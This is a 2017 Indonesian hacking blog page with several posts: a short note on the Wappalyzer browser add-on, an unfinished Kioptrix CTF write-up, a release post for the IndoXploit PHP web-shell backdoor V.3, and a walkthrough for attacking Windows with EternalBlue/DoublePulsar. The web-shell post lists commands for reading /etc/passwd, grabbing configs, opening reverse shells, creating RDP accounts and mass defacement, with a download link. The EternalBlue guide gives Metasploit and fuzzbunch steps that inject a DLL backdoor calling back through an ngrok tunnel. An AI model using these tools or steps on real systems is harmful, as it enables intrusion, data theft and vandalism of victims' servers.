Sunday, 18 June 2017

Deteksi CMS, Web Server, dan Framework dengan Wappalyzer



Wappalyzer adalah utilitas lintas platform yang mengungkap teknologi yang digunakan di situs web. Ini mendeteksi sistem pengelolaan konten, platform e-niaga, kerangka web, perangkat lunak server, alat analisis dan banyak lagi.


Dengan ini kalian akan semakin dipermudah dalam mendapatkan informasi-informasi dalam website. Untuk mendapatkannya cukup mudah, karena ini adalah sebuah addons pada browser. Kalian cukup menginstalnya saja.


Informasi lainnya kalian bisa langsung kunjungi website resmi dari Wappalyzer.
https://wappalyzer.com/

Oke sekian dulu, semoga bermanfaat.



Tuesday, 13 June 2017

Sunday, 11 June 2017

Write up CTF Kioptrix 1 [ smb ]


Assalamualaikum..
bismillah..

this session i will explain you how to got access root from server with ilegal access, many more ways/technique for get access root with ilegal, then this session i will show you how to get access root from SMB.

ok, SMB is which stands for Server Message Block, is a protocol for sharing files, printers, serial ports, and communications abstractions such as named pipes and mail slots between computers.
The earliest document I have on the SMB protocol is an IBM document from 1985. It is a copy of an IBM Personal Computer Seminar Proceedings from May 1985. It contains the IBM PC Network SMB Protocol. The next document I have access to is a Microsoft/Intel document called Microsoft Networks/OpenNET-FILE SHARING PROTOCOL from 1987. The protocol was subsequently developed further by Microsoft and others. Many of the documents that define the SMB protocol(s) are available at ftp.microsoft.com in the SMB documentation area.

ok i will use SearchSploit usefull for searching exploit,

here we go, i will explain you , what requirement you need it for got root:

1. Linux / VPS

2. install Netdiscover
sudo apt-get install netdiscover
or

you can use arp -a

3. install SearchSploit
git clone https://github.com/offensive-security/exploit-database.git

4. install Nmap
sudo apt-get install Nmap 


3. install Kioptrix 1.1 for example
Download


Saturday, 10 June 2017

IndoXploit Shell First Edition [ V.3 ]

Haloo, selamat malammm.
Kali ini kita akan share lagi shell backdoor indoxploit. Kali ini kami tambah beberapa fitur-fitur baru yang sebelumnya tidak ada di indoxploit shell, tentu serta beberapa perubahan bentuk shell dan lainnya. Oke Langsung saja disimak.

IndoXploit Shell V.3 menggunakan 'Command Based' atau bisa dibilang untuk menjalankan beberapa tools/fiturnya, kalian harus memasukan command tertentu.

Contoh command untuk memanggil tools 'Adminer'


Login Shell, default password: IndoXploit

 [ List Tools - IndoXploit Shell Backdoor V.3 ]

=============================================
**** COMMAND BASED *****
 - Read File
 usage: rf [filename]
 example: rf /etc/passwd

 - Spawn File/Tools 
 usage: spawn [name]

 [name]
- Adminer (adminer)
 - WebConsole (webconsole)
 - CGI Telnet 1 (cgitelnet1)
 - CGI Telnet 2 (cgitelnet2)
 - PHPINFO (phpinfo)

 example:
 spawn adminer
 spawn webconsole
 spawn cgitelnet1

Jumping
usage: jumping

Config Grabber
usage: idxconfig

 - Symlink 
 usage: symlink

 - Reverse Shell 
 [Back Connect]
 usage: rvr bc [IP] [PORT] [TYPE]
 example:
 rvr bc 127.0.0.1 1337 bash
 rvr bc 127.0.0.1 1337 perl

 [Bind Port]
 usage: rvr bp [PORT] [TYPE]
 example:
 rvr bp 1337 perl

 - KRDP - Create RDP Account (for windows server only) 
 usage: krdp

 - Logout From Shell
usage: logout

 - Kill Backdoor 
usage: killme
=============================================
- Mass Password Change
- Fake Root
- Cpanel Crack
- Mass Deface/Delete File
- Zone-H Mass Submit



#Link Download: 
https://github.com/agussetyar/idxshellv3/blob/master/indoxploit.php

###############################################################################
Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.

Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
Tanpa kalian kita tidak akan BESAR seperti sekarang.

Greetz: 
All Member IndoXploit. & All My Friends.
###############################################################################
Special Thanks: 
Depok Cyber Security | Sanjungan Jiwa | 0x1999
###############################################################################

Thursday, 8 June 2017

Exploit windows dengan eternalblue_doublepulsar & ngrok

Exploit windows dengan eternalblue_doublepulsar & ngrok.

Berhubung repositorynya backboxindonesia lagi bermasalah jdi saya buat alternativenya.

Download semua bahan2 dulu : https://github.com/black-hell/exploit

eternalblue_doublepulsar : https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit 

Untuk penginstalan ngrok bisa ke sini : https://ngrok.com/

Dan untuk bisa menggunakan doublepulsar, anda harus menginstall wine.

 1. Cari target yg vuln SMB, untuk mengetahui apakah target vuln SMB bisa cek  dengan ms17_010, Jika target vuln maka akan seperti dibawah ini.
use auxiliary/scanner/smb/smb_ms17_010

2. Kalo sudah lanjut untuk exploit target dengan eternalblue_doublepulsar.
use exploit/windows/smb/eternalblue_doublepulsar

Jika backdoor sukses, mari lanjut ke tahap berikut :D

3. Lanjut dengan ngrok.
ngrok tcp 123

4.  Tahap pembuatan backdoor dengan pusdik. Atur pembuatan backdoor dengan ip dan port di ngrok, sedangkan untuk listenya port 123 sesuai dengan yg saya bikin.
[?] LHOST  : 0.tcp.ngrok.io
[?] LPORT  : 13588
[?] Listen (y/n) : y
[?] LPORT  : 123
  
jika sudah copykan file backdoor yg anda buat ke folder /tmp/.
cp win64.dll /tmp/
5. Next exploitasi win tsb, buka fuzzbunch yg sudah di download tdi.
fuzzbunch

 


Set TargetIp :(ipkorban), enter, set Architecture [1] :(x64/x86), enter, set Function : pilih nomor 2(RunDLL), enter, set DllPayload  : /tmp/win64.dll, enter, set ProcessName : explorer.exe.

6. JIka sudah, enter tunggu sampai tulisan
     DLL built
     Sending shellcode to inject DLL
     Backdoor returned code: 10 - Success!
     Command completed successfully

dan selesailah exploitasi windows tsb :v